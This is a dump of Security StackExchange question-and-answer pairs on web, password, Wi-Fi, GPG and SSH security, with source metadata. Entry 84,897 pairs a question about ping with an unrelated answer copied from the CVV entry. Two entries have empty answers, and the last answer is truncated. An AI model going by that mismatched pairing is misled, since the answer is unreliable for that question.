84,818 | Let's say there's a URL www.badjs.com which is untrusted and may contain bad scripts. Intuitively, a view-source navigation to that URL does not execute any scripts so it should be safe. It would at least allow me to inspect the source safely. But intuition is a terrible way to draw conclusions on security issues, so my question is: Is view-source a safe way to look at a website from a js script injection perspective? | Yes, it is absolutely safe (in Google Chrome) to open an untrusted website in view-source mode. The key point to note here is that you should "open" the page in view-source mode, meaning you should not allow any rendering to happen by normally loading the webpage first and then viewing the source. An example in Google Chrome would be view-source:http://www.badjs.com/ By design, Google Chrome will initiate a new GET request to the server and provide the client browser with the unrendered version of the webpage when in view-source mode. You could also use a No-Script extension or add-on for your specific browser to prevent any scripting attacks. | {
"source": [
"https://security.stackexchange.com/questions/84818",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/68349/"
]
} |
84,894 | Most popular web services like PayPal, Google Wallet, and others do not mask CVV numbers, eg: ( <input type="password"> ). As I read, the CVV is a security feature and it seems logical to mask it in order to hide it from prying eyes. But I haven't see any web service that masks this input. | Most likely answer: They don't have to (it's not a PCI requirement) It's better from a UI/support standpoint Let's keep this in perspective. This is the number that's printed, on the back of the card, right where minimum-wage cashiers are instructed to visually inspect when performing a POS transaction. Absolute secrecy from physical bystanders is clearly not the intended control for the CSC ! Pay attention rather to the aggressive controls the PCI DSS imposes to ensure it's never stored by anyone in the processing chain. They are not concerned with onesie-twosies being shoulder-surfed, they're concerned with the people who steal credit card databases getting away with the CSC too. | {
"source": [
"https://security.stackexchange.com/questions/84894",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/57297/"
]
} |
84,897 | I am using ping command to test my website which is running on a local server at the moment. | Most likely answer: They don't have to (it's not a PCI requirement) It's better from a UI/support standpoint Let's keep this in perspective. This is the number that's printed, on the back of the card, right where minimum-wage cashiers are instructed to visually inspect when performing a POS transaction. Absolute secrecy from physical bystanders is clearly not the intended control for the CSC ! Pay attention rather to the aggressive controls the PCI DSS imposes to ensure it's never stored by anyone in the processing chain. They are not concerned with onesie-twosies being shoulder-surfed, they're concerned with the people who steal credit card databases getting away with the CSC too. | {
"source": [
"https://security.stackexchange.com/questions/84897",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/71385/"
]
} |
84,906 | I was reading up on the documentation for Math.random() and I found the note: Math.random() does not provide cryptographically secure random
numbers. Do not use them for anything related to security. Use the Web
Crypto API instead, and more precisely the
window.crypto.getRandomValues() method. Is it possible to predict what numbers a call to random will generate? If so - how could this be done? | Indeed, Math.random() is not cryptographically secure. Definition of Math.random() The definition of Math.random() in the ES6 specification left a lot of freedom about the implementation of the function in JavaScript engines: Returns a Number value with positive sign, greater than or equal to 0 but less than 1, chosen randomly or pseudo randomly with approximately uniform distribution over that range, using an implementation-dependent algorithm or strategy. This function takes no arguments. Each Math.random function created for distinct code Realms must produce a distinct sequence of values from successive calls. So let's have a look at how the most popular JavaScript engines implemented it. SpiderMonkey, used by Firefox and many programs , implemented an algorithm named Xorshift128+ ( link to Mozilla's repository ). V8, used by Chrome and Node.js , also implemented the Xorshift128+ algorithm (called in the RandomNumberGenerator function ) Webkit, used by Safari , also implemented the Xorshift128+ algorithm . Chakra , the JavaScript engine powering Microsoft Edge, also implemented the Xorshift128+ algorithm . Xorshift128+ is one of the XorShift random number generators , which are among the fastest non-cryptographically-secure random number generators. I don't know if there's any attack on any of the implementations listed above, though. But those implementations are very recent, and other implementations (and vulnerabilities) existed in the past, and may still exist if your browser / server haven't been updated. Update: douggard's answer explains how someone can recover the state XorShift128+ and predict Math.random() values. V8's MWC1616 algorithm On November 2015, Mike Malone explained in a blog post that V8's implementation of the MWC1616 algorithm was somehow broken : you can see some linear patterns on this test or on this one if you're using a V8-based browser. The V8 team handled it and released a fix in Chromium 49 (on January 15th, 2016) and Chrome 49 (on March 8th, 2016). This paper pulished in 2009 explained how to determine the state of the PRNG of V8's based on the previous outputs of Math.random() (the MWC1616 version). Here's a Python script which implements it (even if the outputs are not consecutive). This has been exploited in a real world attack on CSGOJackbot , a betting site built with Node.js. The attacker was fair enough to just make fun of this vulnerability. Lack of compartmentalization Before ES6, the Math.random() definition didn't specify that distinct pages had to produce distinct sequences of values. This allowed an attacker to generate some random numbers, determine the state of the PNRG, redirect the user to a vulnerable application (which would use Math.random() for sensitive things) and predict which number Math.random() was going to return. This blog post presents some code about how to do it (Internet Explorer 8 and below). The ES6 specification (which had been approved as a standard on June 17, 2015) makes sure that browsers handle this case correctly. Badly-chosen seed Guessing the seed chosen for initializing the sequence can also allow an attacker to predict the numbers in the sequence. It's also a real world scenario, since it has been used on Facebook in 2012. This paper published in 2008 explains different methods to leak some information thanks to the browsers' lack of randomness. 
Solutions First of all, always make sure that your browsers / servers are updated regularly. Then, you should use cryptographic functions if needed: If you're working in a browser environment, then you can use crypto.getRandomValues , part of the Web Crypto API (check the support table ). If you're working with Node.js, then you can use crypto.randomBytes . Both rely on OS-level entropy, and will let you get cryptographically random values. | {
"source": [
"https://security.stackexchange.com/questions/84906",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/5169/"
]
} |
84,970 | I just changed the password on a school-related web site. After completing the change successfully, the next page showed what the password was changed to. Can I conclude from this that the password is not being stored only as a hash? | No, you cannot conclude that. The password can be hashed on the server-side only, which implies that the password is sent in plain text to the server and stored in a variable. Then, nothing stops the Web application from displaying the sent password to the user, in the case where the very same script that has received the password is giving you the feedback about the password change. On the other hand, if a whole other module gives you the password in plain text (perhaps a password recovery function), then you could conclude that it is not hashed. Edit: To avoid any confusion, in this case "plain text" does not refer to SSL in any way, it simply suggests that the password is not sent pre-hashed to the server. | {
"source": [
"https://security.stackexchange.com/questions/84970",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/67483/"
]
} |
85,031 | While I do not claim to be an expert in all things security based, I'd think that I have a good grounded knowledge of what is acceptable and what is not in regards to digital security. After giving some general advice on internal network security, I was advised by a company that physical access based attacks (i.e. attacker has access to internal network) are unrealistic and are considered out of scope. I was informed that due to the company having a guest wifi system which is in a DMZ, it's not a problem for them. The main oversight that they don't seem to understand or accept is that from outside the office, you can see in plain sight the private wifi password stuck to the walls around the office, as so many people constantly forget them. Without lighting fires, I am really struggling to get them to accept that this is horrible practice and they are really opening themselves up if an attacked or compromised system was connected to their private wifi. For example, a customer brings a device into the office for a meeting, sees a publicly advertised wifi password in the meeting room and continues to connect to the wifi. The customer's machine is compromised and now has full access to the private internal network containing business critical data, and a ton of personal data due to bad domain policies. Any suggestions on the best way to approach this situation? | Take a passive approach and do a risk assessment. Security management is a form of risk management. You have assets which might have threats and vulnerabilities. A threat exploiting a vulnerability is a risk, which is assessed by calculating (quantitative) or estimating (qualitative) the likelihood and impact (most of the time it's high, medium, low, but some organizations have their own scale). First you expose the risk. You derive the impact of an attacker having access to the internal network. Then you assess the likelihood and technical complexity. In your case the hard part is getting buy-in from your management. So the first thing to do is taking references. Have a look to see whether there are specific requirements for the type of business you are in, the size of your business and what industry best practice guides say you should do (NIST). It's important to structure your risks like this, ensuring you have both the technical reasons and a clear business impact (what is this going to cost the business?) (in the end the business is what it's all about, IT is just an enabler). As you are from the UK and you clearly think there is a risk for private data, have a look at the Data Protection Act . It's always interesting to show what can happen by referring to cases which bear a similarity to your current environment. Make sure that they understand that the upper management can be held personally accountable if it's deemed they made wrong decisions (e.g. not fixing this), but do not threaten them as this may have an adverse effect. There's also the EU General Data Protection Regulation , which will be finalized at the end of this year. It allows the EU to fine companies up to 5% of their global turnover in case severe mismanagement of personal data is found. After you have made the report, you need to present it to your management, which is someone responsible for the business and someone responsible for IT, as well as your internal audit department. That's the easy part. Now comes the hard part: sell security . You will need to get buy-in from your upper management to fix this, which will most likely cost money as they will need to spend resources.
Unfortunately it's quite hard to do so; you need to involve your stakeholders in the security process and explain the benefits to them. It's important to involve all employees in your security process. The security executive cannot sell the necessity and importance of the security function to others if people do not understand it. Now the best way to get buy-in is to make them understand first. Make sure you think of a solution for each problem you face; you're already halfway there if you can come up with a good alternative. In your case it could be password managers or using domain credentials (PEAP authentication). I'm not a fan of allowing just any device into the internal network; preferably the only devices allowed should be those issued by the company. Note that the business may decide to sign off on the risk. This means that they're aware of the risk, but choose not to do anything about it. In the end there's only so much you can do. To be fair, it's not uncommon that a serious incident occurs before people start seeing the importance of security. It's sad, but the hard truth. | {
"source": [
"https://security.stackexchange.com/questions/85031",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/71448/"
]
} |
85,074 | I am developing an application in PHP and it uses bcrypt encryption to store passwords. I want to keep the history of hashes whenever the user changes the password. By doing this I want to stop the user from entering the previous passwords in some scenarios. Is it safe to keep the history of hashes? According to my observation, if a user changes his password and keeps the same as a previous one, the hash values become different. How can I stop him from keeping the same password from the previous history? Is it possible while using bcrypt encryption? | Security of storing Hash History Is it safe to keep the history of hashes? Relatively. I can imagine some scenarios where this would harm the security of the user, eg: A user uses a relatively weak password, realizes this and updates the password to a better password, based on the previous password (simple example: superawesome -> !sup3eraw3s0m3! ), this would lead to an attacker being able to easier crack the now more secure password (they first crack the easy password, have it in their wordlist now, and then apply basic rules to it such as e -> 3, etc). They previously used a password on your website that they also use at a lot of other websites, stopped trusting your website, and thus changed the password at your website. An attacker could get your database, crack their old password (which they thought would be deleted from your database), and then try the login credentials at a different website. After a while, you have a lot of history on a user that changes passwords frequently. An attacker cracks lets say 30% of the history hashes, and now has a pretty good idea how that specific user creates passwords. If the user doesn't create passwords truly random, it will be a lot easier to break the current password. So I would not recommend keeping a password hash history. Alternative How can I stop him to keep the same password from the previous history? Don't keep a history. When a user changes their password, you still have the original password hash in the database. You can compare it to that to prevent exact duplicates. But using bcrypt, this happens: According to my observation, if a user changes his password and keeps the same as a previous one, the hash values become different It happens because bcrypt automatically manages salts for you. So when you hash a new password, it is hashed with a different salt, and thus the hash is different. You could retrieve the old salt , and then pass it onto password_hash as argument to get the same hash. Better Alternative You could also require the user to submit their old password when changing passwords (which also increases security[*]), and then you can even check if the new password is similar to the old password (eg using hamming distance or similar). Both of my alternatives do not prevent cyclic changes though (eg super-secure-password -> another-awesome-credential -> super-secure-password ), but I'm not sure if I would really be worried about that. [*] someone highjacking a session can't change the password, and the password can't be changed by CSRF (even if there is an XSS vulnerability). | {
"source": [
"https://security.stackexchange.com/questions/85074",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/71332/"
]
} |
85,138 | Let's say you are traveling, and you pause in the airport lounge, or your hotel lobby, or a nearby coffee shop. You haul out your laptop and scan the available wireless networks. You know the name of the wireless network because it is written behind the counter/on a slip of paper/well known. You see that there are two options: "Free Public Wifi" & "Free Public Wifi" Which one is the actual wireless network, and which one is the Evil Twin attack? How can you tell? What tools or techniques would you use to decide? (I'm less interested in answers that involve not connecting to either, or avoiding public wireless, and more interested in the techniques to discriminate legitimate vs non-legitimate APs from a user's, not an administrator's, perspective. I'm using " Evil Twin " in this specific sense rather than a general "malicious actor" sense.) | Traditionally there hasn't been an easy user-oriented method to detect evil twin attacks. Most attempts to detect an evil twin attack (ETA) are geared towards the administrator of a network, where the authorised network admins scan and compare wireless traffic. This isn't so much what you are interested in. There is a paper here (and slides ) that goes over an experimental approach to detecting an ETA in real time from the user's perspective. Basically, they use a cunning approach to statistically determine which access point is authorised and which is the evil twin. A simple approach (that will not always work) that I propose is to merely sniff yourself and see what the IP addresses are. The idea being that an unauthorised AP will have a nonstandard (i.e. not what you would expect) IP and thus throw up some red flags... Here is a link that describes how to set up your own ETA so you can play around with my method (or try your own). WARNING: If you are creating an ETA, do so in a lab environment, as this is illegal in public. Also note that an ETA can be greatly mitigated by simply securing the network via an authentication system that uses Extensible Authentication Protocols such as WPA2-Enterprise, which works by validating both the client and the access point. To address some other points... If you have a way to communicate with the authorised network administrators (or at least know which access point is the proper one), then you have already completed a pseudo-meta-authorisation method outside of the digital realm (i.e. I can physically see the proper router and know its MAC address, IP settings, etc., and can thus compare them with what my adapter is telling me I'm connected to). Most often, we do not have this info and moreover shouldn't trust it even if we did. Thus, perhaps the 'best' method for using an untrusted network (ET or not) is to always assume it is compromised and implement a VPN or simply abstain altogether! | {
"source": [
"https://security.stackexchange.com/questions/85138",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/70682/"
]
} |
85,157 | When I send, say, a great recipe for funnel cake to Alice and Bob using GPG, I can be pretty sure they will both be able to decrypt it. However, can I be certain, or prove after the fact, that they will be the only ones who can?* Context : I assumed this was easy: gpg messages have a list of possible decryption key IDs, which I thought was always guaranteed to be complete. However, then I stumbled upon the --try-all-secrets option for gpg itself and now I'm not sure anymore. If I understand the options correctly, I can have a key that is able to decrypt the message, but is not on the 'public' list of recipients. The 'public' list might have an all-zeroes key ID to show there's something going on but it appears it doesn't always need to. So, that got me thinking... Question : Would I be able to tell (based on the encrypted output only) if someone had modified my version of gpg to secretly add Eve as an anonymous recipient? Would I need to be one of the recipients to be able to tell? I know that this scenario would probably never occur in practice, and if an attacker was able to replace your gpg binary this scenario would probably be the least of your worries, but I'm still curious. *: Assuming of course their private keys are kept private, nobody bribes Alice to share the winning recipe, and so on. | You can't necessarily tell who can decrypt a given GPG file by looking at it, but assuming nobody has any knowledge aside from their own private keys and the encrypted file itself, it is possible tell how many people can. When you encrypt a message, GPG generates a random symmetric key, called a "session key", and uses it to encrypt the message. It then makes a bunch of copies of the session key, and encrypts each one under a different public key, one for each recipient. It then packages all of these encrypted "key packets" along with the encrypted message using the OpenPGP container format . The important thing is that if all you have is the encrypted file, you have to be able to decrypt at least one of these encrypted session key packets in order to get to the message. You can list all of the packets in an encrypted file using the gpg --list-packets command: $ gpg --batch --list-packets myfile.gpg
:pubkey enc packet: version 3, algo 16, keyid 0000000000000000
data: [2048 bits]
data: [2046 bits]
gpg: anonymous recipient; trying secret key ABCDE123 ...
:pubkey enc packet: version 3, algo 16, keyid 123ABCDE0987654F
data: [2048 bits]
data: [2046 bits]
:encrypted data packet:
... (The --batch flag prevents GPG from asking me for my passphrase, so that it can't decrypt anything. If you're running a GPG agent, it'll take more than that.) Those "pubkey encrypted packets" are encrypted session key packets that were read from the file. The one with "keyid 123ABCDE0987654F" is a normal recipient; the key ID is a hint to tell you which key can be used to decrypt the packet. The one with "keyid 0000000000000000" is an anonymous recipient: you don't know which key will decrypt it, but you know it's there waiting to be decrypted by something . If your gpg was modified to add Eve as an anonymous recipient, this is what you would see when inspecting the .gpg file using a clean gpg binary. It's also what you would see if you added an anonymous recipient on purpose. If Eve's a little more clever, though, then there are a couple of ways to further hide recipients: The listed keyid value could be a lie. The all-zeroes keyid is just a convention, and the normal keyid is just a hint: there could be anything there. Eve could label her encrypted key packet using Bob's keyid, and replace Bob's legitimate packet with hers. It would look like a packet for Bob, but if he tried to use it, the decryption would fail. Only Bob would be able to check this. The --try-all-secrets flag is somewhat related, and could be useful if the keyid was accidentally wrong. Eve doesn't have to put her key packet into the file, or even create an encrypted key packet for herself at all. Try out the --show-session-key and --override-session-key flags on a dummy file with no sensitive data. These will let you handle the session key directly instead of keeping it hidden away in encrypted key packets. If Eve has replaced your gpg binary, she could (for example) have it email her the session key of every file you encrypt, along with a hash of the encrypted data for easy identification. This violates the "no prior knowledge" assumption from earlier, but I felt the existence of these flags made it worth mentioning. | {
"source": [
"https://security.stackexchange.com/questions/85157",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/71654/"
]
} |
85,160 | An online bank I use requires inputting your username, navigating to a second page and then entering the password to login. What actual security advantage does this provide, if any? | From a security control perspective , all it really does is slow down the ability of automated password probing software to perform their task of trying out multiple passwords. The site is hoping an attacker may choose a "softer" target instead of their site. As an actual security control, this technique is not particularly effective. Also, specifically for banks, this is one of several Industry
approved "security enhancements" that the U.S. banking industry is requiring
member banks to choose from. In the U.S. in 2011, all banks and
credit unions were informed of new cybersecurity policy from the
Federal Financial Institutions Examination Council
( https://www.ffiec.gov/pdf/Auth-ITS-Final%206-22-11%20%28FFIEC%20Formated%29.pdf ),
along with authentication guidance presentations
( https://chapters.theiia.org/western-new-york/ChapterDocuments/FFIEC%20Authentication%20Guidance.pptx ).
I remember the bank I use converting their login pages in 2012 and 2013
to meet the new standards before their annual audit, including moving the password to a separate page from the userid. Given all the
stolen password lists, the separate stolen email address lists, the
fact that most users use the same password on all the sites they have
accounts at, and the fact that most sites stupidly (from a security
perspective) force user-ids to be email addresses, there are new
types of highly selective "low-and-slow" over-the-web password
probing systems that take advantage of all the above. So the site is hoping that making the login sequence slower to do the automated password probing may make the attackers give up sooner. From a security UI design perspective , this UI design pattern does offer some useful advantages. It allows sites that adopt it to add conditional authentication steps. For example, a site can offer their users the option for a text-message token to create a two-factor authentication. For those users that provided a mobile number, the sequence may be: page1=enter userid, page2=enter token, page3=enter password. For those users that did not provide a mobile number, it is just page1=enter userid, page2=enter password. This UI design template also allows for gradual conversion of their user base to newer and stronger authentication both over-a-timespan and user-by-user , which are both critical considerations for a site with thousands or more of users. Another example, the bank I use in 2012 converted their login pages to first ask me for user id, then asks me to confirm an image I picked in my profile from a set of images, then finally asks for my password, all on separate pages. Whether or not picking an image from a set of images really adds any authentication effectiveness is a separate issue from the question about the login UI design template. A further example, some banks chose to implement a "UI Keyboard" to attempt to thwart key loggers (userid is entered on one page with a regular UI text field, then a second page is brought up with the "UI Keyboard". One can debate whether an on-screen keyboard is or is not effectivesecurity-wise, but the UI design pattern of configurable and sequential authentication on separate pages allows sites this freedom to innovate. Most sites do not prematurely end the login sequence if something is incorrectly entered. The end-user enters all information in the various pages of the sequence, and only at the end learns if authentication was successful or not. Some sites do exit early, which creates some institutional residual risk in terms of account validity detection. Which specific authentication steps are shown can even vary by the particular user-id given what that user selected in their profile. So sites that do this are not forced anymore to offer only one fixed authentication sequence for all their end-users. Even more advanced login systems of this style can even vary the authentication steps for the same end-user who fails a first authentication, or is accessing from an unknown computer/device, or from an IP address that is significantly out-of-area, or if the site's automated IDS software thinks a password probing attack is in-progress. So separating IDENTIFICATION from AUTHENTICATION (aka user-id from password and other steps) in the login UI gives sites more freedom and flexibility to evolve their login processes over time. Those sites that change their login pages to this new template can further adapt or alter the login sequence in the future, yet have their end-users not feel like the login process is changing all that much. | {
"source": [
"https://security.stackexchange.com/questions/85160",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/71661/"
]
} |
85,162 | Do state of the art commercial URL threat intelligence feeds (for example, ones by Symantec, Intel Security, etc.) miss malicious domains? (i.e. domains serving malware, exploit code & phishing domains - to make the discussion specific.) If so, why? What are the technical challenges people are facing in solving this problem?
I understand that there are many methods people use to do detection, including a combination of machine learning, capturing data with honeypots, etc., behind the scenes to generate such feeds.
I want to specifically understand what technical obstacles limit the effectiveness of these methods and why they miss what they miss. | | {
"source": [
"https://security.stackexchange.com/questions/85162",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/10160/"
]
} |
85,165 | I went through the question Securing a JavaScript Single Page App with RESTful backend that has discussions / options around securing a Javascript client side app that invokes RESTful APIs. However, from the discussions, it is not clear as to how the "shared secret" that is used for computing the HMAC is kept safe at the client side. Storing such a Shared secret in either a Cookie (which is accessible from scripts) or even in local storage is no-good as these are vulnerable to leaks. Are the keys generated dynamically so that every round trip to the server returns a new key that is to be used for computing the HMAC for the next round trip ? | | {
"source": [
"https://security.stackexchange.com/questions/85165",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/32783/"
]
} |
85,253 | So I mistook input fields and now my SSH key passphrase is visible to the world, and I can't even remove it. Now as far as I understand, this is not an immediate security concern, since the passphrase only protects against the case of my private key itself getting disclosed. Since that hasn't happened (they key only exists on hardware I own), I at most have to change the passphrase in case it happens in the future, I don't have to change to a different SSH key everywhere I've used it. Is that correct? Keeping in mind that all of this is for private projects and a hypothetical breach could at most be annoying and embarassing. | Technically , changing your passphrase is sufficient if you don't also believe that your (password-protected) private key has also been leaked. Realistically , you might just want to replace your SSH key with a new one. They're so cheap they might as well be free, and it removes you from worrying about whether anyone has, is, or will be able to get a copy of the private key with the compromised passphrase. Remember, if somebody grabs a copy of your key that you backed up months before you leaked (and changed) your passphrase, the passphrase still gives them access to that key - which is the same as you're using today under a new passphrase. So just change your key. It's good practice and best practices. Edit: @David-Z has suggested that the time involved in replacing the key is a cost to be considered. I maintain that, since we're talking about keys, that's also negligible, as you can automate the process. The following script took me about 15 minutes to write and test: #!/bin/bash
for i in $*
do
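# use the old key to authenticate and append the new public key to the remote authorized_keys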
cat newkey.pub | ssh -i oldkey username@$i "cat >> ~/.ssh/authorized_keys"
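# then use the new key to authenticate and filter the old key's line (matching 'my_old_key') out of authorized_keys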
ssh -i newkey username@$i "sed -n '/my_old_key/!p' < ~/.ssh/authorized_keys > ~/.ssh/authorized_keys_tmp && mv ~/.ssh/authorized_keys_tmp ~/.ssh/authorized_keys"
if [ $? -eq 0 ]; then
echo "Successful key replacement for $i"
else
echo "Key replacement failed for $i"
fi
done This script will: Use the old key to append the new key to the remote authorized_keys Use the new key to remove the old key from the remote authorized_keys The beauty is that if anything went wrong pushing the new key out, the removal of the old key will fail since it uses the new key, so you're less likely to shoot yourself in the foot. You'll need to cache your passphrases with ssh-agent so that it doesn't prompt you for these uses of ssh; then just run it with the servers you want to update on the command line: $ ssh-agent
SSH_AUTH_SOCK=/tmp/ssh-GWE6uxZxn9IS/agent.2016; export SSH_AUTH_SOCK;
SSH_AGENT_PID=2017; export SSH_AGENT_PID;
echo Agent pid 2017;
$ ssh-add oldkey
Enter passphrase for oldkey:
Identity added: oldkey (oldkey)
$ ssh-add newkey
Enter passphrase for newkey:
Identity added: newkey (newkey)
$ ./chssh.sh server1 server2 server3
Successful key replacement for server1
Successful key replacement for server2
Successful key replacement for server3
$ | {
"source": [
"https://security.stackexchange.com/questions/85253",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/10837/"
]
} |
85,264 | Lately, whenever I click on a download link in Google Chrome, it redirects to another link starting with s3.amazonaws.com , which in turn gets blocked either by Chrome or by my Antivirus (Comodo Internet Security). Copying the same link into Firefox or (*) a download manager downloads the file normally. I have tried resetting Chrome settings, disconnecting my Google account, removing all extensions, disabling all plugins, and performing a system scan, but the issue persists. My question is: What exactly is s3.amazonaws.com ? Is it malicious, or is Chrome mistrusting it? And how do I fix the issue? Edit: An example file that invokes such behavior is Pandoc msi setup from this page (*) It no longer works with Firefox | s3.amazonaws.com is an endpoint for a cloud file storage product offered by Amazon Web Services (AWS) and is used by many websites and apps (albeit usually behind the scenes, but you can serve files from it directly too). Seeing references to that domain is definitely not inherently malicious, however given that you can store just about any file in S3 there's no guarantee that it isn't being used to store some malicious files (among the overwhelmingly legitimate files). AWS credentials are a valuable target for hackers so it's possible the owner of the account has been compromised. Chrome and Comodo may know that attributes such as the size, checksum, name, etc. of the file match that of known malware which is why they're blocking it (rather than necessarily because it's served from s3.amazonaws.com ). I'd recommend reporting it via the AWS abuse form or by emailing [email protected] . If it is malware then they'll most likely remove it and contact the account owner. AWS is usually extremely proactive about security issues. | {
"source": [
"https://security.stackexchange.com/questions/85264",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/51694/"
]
} |
85,275 | Right now I'm developing a web application and it uses a lot of JavaScript functions so I'm putting all of them in different JS files to access from the HTML, but the functions are "easy readable" so the atacker knows what is going on with the application. My question is, Is it dangerous that the attacker knows all the JavaScript functions and all the CSS styles (effects) ? If this is true, is there a good solution for this? I know that I can minify the JavaScript but anyway this will only make the hacker angry... | To state it more directly: Is it dangerous that the attacker knows all the JavaScript functions and all the CSS styles (effects) ? No, it is not inherently dangerous for an attacker to see JS and CSS. After all, the attacker or any other client must be able to see these files in order for the application to work at all! It is your job to design your application so that an attacker who has complete access to the HTML, CSS, and Javascript code still will not be able to execute an attack (whether an attack on the server, or a "client-side" exploit like cross-site request forgery). Easier said than done, of course, but that is the goal. Actually, good security would mean designing your app so that an attacker who has complete (read-only) access to the HTML, CSS, JS, the server-side scripts, the web server's source code, and the system's configuration still could not pull off an attack. Attackers can, in general, get access to all these things. But in practice, you can take measures to hide the server-side configuration and source code, and it will slow down someone who is not sufficiently determined. You cannot hide the HTML/CSS/JS and still expect the web application to work. | {
"source": [
"https://security.stackexchange.com/questions/85275",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/70868/"
]
} |
85,391 | I heard in a security talk today (I didn't have the opportunity to ask questions): The speaker mentioned that he observed (2 years ago) that a possible malware on a given computer was behaving such that, when the user visits a legitimate URL via the browser, the malware changes the URL that needs to be visited; so the URL in the address bar remains the same, but the page visited is now malicious. Can someone tell how a malware could achieve this OR is this even possible today ?
Is the malware somehow intercepting the request sent by the browser ? | There are several ways to achieve this: Malware working as a proxy or directly hooked into the browser (like with browser extensions) can change the content of the site itself; that is, one will still visit the original site but the content will be changed in transit or gets changed inside the browser with script injection or similar. This kind of malware is often used to inject advertisements. By changing the DNS settings, malware can make lookups return attacker-controlled IP addresses for a host name instead of the real IP addresses. This way all traffic to these hosts goes to the attacker, which can then provide different content. DNS settings can be changed on the computer itself or even on the router. In the latter case all systems in the local network are affected. See https://nakedsecurity.sophos.com/2012/10/01/hacked-routers-brazil-vb2012/ for a detailed example. Otherwise, compromised middleboxes (routers, firewalls, proxies) can also be used to change or redirect traffic. | {
"source": [
"https://security.stackexchange.com/questions/85391",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/42517/"
]
} |
85,435 | I've seen the following login rate limiting approach used on a web site I worked on, but I can't figure out if it's a good idea: After any failed login attempt, the site locks the user account for a fraction of a second. When the account is locked, any login attempts will fail, even attempts with correct credentials. The user is not told that their account is locked, only that their login failed. The idea is that real users will generally take longer than the lockout time to re-enter their credentials (and will probably re-enter them more slowly the third time if they accidentally trigger the lockout). Meanwhile, hackers brute-forcing passwords would trip the lockout with high-volume login attempts. What are the problems with this approach? | There's a growing number of what I am calling "slow brute force attacks". Where a bot net with a listing of targets makes a low number of attempts at regular intervals to each target in effort to not get caught by the usual methods of monitoring fast attacks. I manage a number of websites and I typically see failed login attempts ranging from 3 to 10 attempts on multiple unrelated sites with the exact same user names and password combinations. Typically it is an alphabetical list, but not always. The attempts will usually happen once a day for any number of days. The sophistication of these hacking attempts is very low, but they would likely be able to bypass a brief lockout as you describe. Any user with a weak password can/will eventually be compromised, and the attack is designed to stay below the radar. Your method might be very useful for a specific type/speed of fast attack, but it should be just one of many tools if you choose to use it at all. | {
"source": [
"https://security.stackexchange.com/questions/85435",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/21359/"
]
} |
85,683 | Passwords with a mixture of letters, numbers, and special characters are sometimes hard to remember. Is it secure to instead use a small amount of memorable source code as a 'passphrase'? As an example, take a simple for loop in Go: fori:=1;i<5;i++{fmt.Println(i)} Normal people would only see the cryptic syntax, but as a person with a programming background, this may be easier to memorize. Would it be at least as secure as a normal password? | You can use source code as a password. However, I'd strongly recommend against using source code as a passphrase. The reason for this is entropy. Passwords / passphrases need to provide lots of entropy (100 bits+), and programming languages usually pose severe constraints on the formulation of instructions, thus resulting in less entropy per character than even a standard passphrase. Aside from that, what may be possible is to use a source code file (100 lines+) with lots of complex, non-machine-codable instructions as a keyfile. | {
"source": [
"https://security.stackexchange.com/questions/85683",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/55169/"
]
} |
85,813 | I checked out the app Packet Capture . This app is able to decrypt my app APIs (SSL Enabled) data by mounting a MITM attack using the Android VPN service. This does not even require root. How can I prevent it? We want to transmit secure data through our servers to Android devices. | That app, like all MITM proxy apps such as SandroProxy and mitmproxy, works by installing its own trusted CA certificate on the device. That allows such apps to sign their own certificates, which the device will accept. The certificate has to be manually installed into the user key-store through an explicit system dialogue, after which the device displays a warning that the network may be monitored. It's unlikely (albeit not completely impossible) that a user would do this unintentionally, so overall it's a reasonably low threat. Having said that, if you want to protect your App even if someone has installed a malicious CA certificate then you should implement certificate pinning . If the device is rooted then it is conceivable that an attacker could install a malicious certificate, conceal it, and modify your Apps to compromise validation and prevent pinning. However, if something rogue has root access then essentially your entire device is compromised anyway. | {
"source": [
"https://security.stackexchange.com/questions/85813",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/770/"
]
} |
85,934 | Almost every web service I can imagine has the user pick the password. Why is this? Couldn't the system choose a better password? It doesn't have to be some complicated mess; see this answer . Do users just find their own choices more convenient? When selecting the password for the user, you know the entropy, as opposed to placing some restrictions that may prevent them from using a low entropy scheme. Why do we let the user pick the password? | Why, indeed? Allow me to ignore that question for a moment, and answer your implied question: Should we? That is, should we continue to have users create their own password, which is often weak, instead of just having the system generate a strong password for them? Well, I am of the controversial opinion that there is a pretty strong trade-off here - having a secure password, and KNOWING how secure it is (as you point out), on the one hand, and on the other side is the user's feeling of security. "Usability", to some extent. I think there are several aspects to this feeling of security: some users would want to ensure that they have a strong password themselves (e.g. via a password manager, or diceware); some users would want to select an easy password; and some users want to use the same password everywhere. And yes, many users just plain expect to be able to set their password, for whatever reason - so besides any specific cause, you will still need to fight the re-education battle, which is far from easy. Also, don't forget that once you get a good strong password to the user, the (often non-technical) user still needs to figure out what to do with it - even passphrases become difficult to remember after the first dozen or so, or if you only use it every 6 months... The non-technical user would most likely save it in a word document on their desktop, or in their email. (And of course write the OS password on a sticky note attached to the screen). Now, don't belittle these reasons, or these causes for using weak passwords - we the security industry have created this scenario for the simple folk over years. But it really comes down to: how secure do you need your site to be. How much risk can the user decide to take upon himself/herself, and how much of that is system risk that should be taken out of the user's hands. So bottom line: Yes, I think most sites that have non-negligible security requirements should offer password/passphrase generation. Depending on the profile and architecture, you could offer 3 options when registering an account (or changing password, etc...) - just make sure to only display the password after warning the user against shoulder-surfing: Generate passphrase - with a configured or flexible number of words (default) Generate crazy-strong password with ridiculous entropy, e.g. for saving to password manager Create your own. In fact this is what I've been recommending for some time now (variants dependent on the specific requirements...). Going back to your original question, why is the above not done? I would guess a combination of legacy systems and bad habits; mis-education (the overwhelming majority of sites 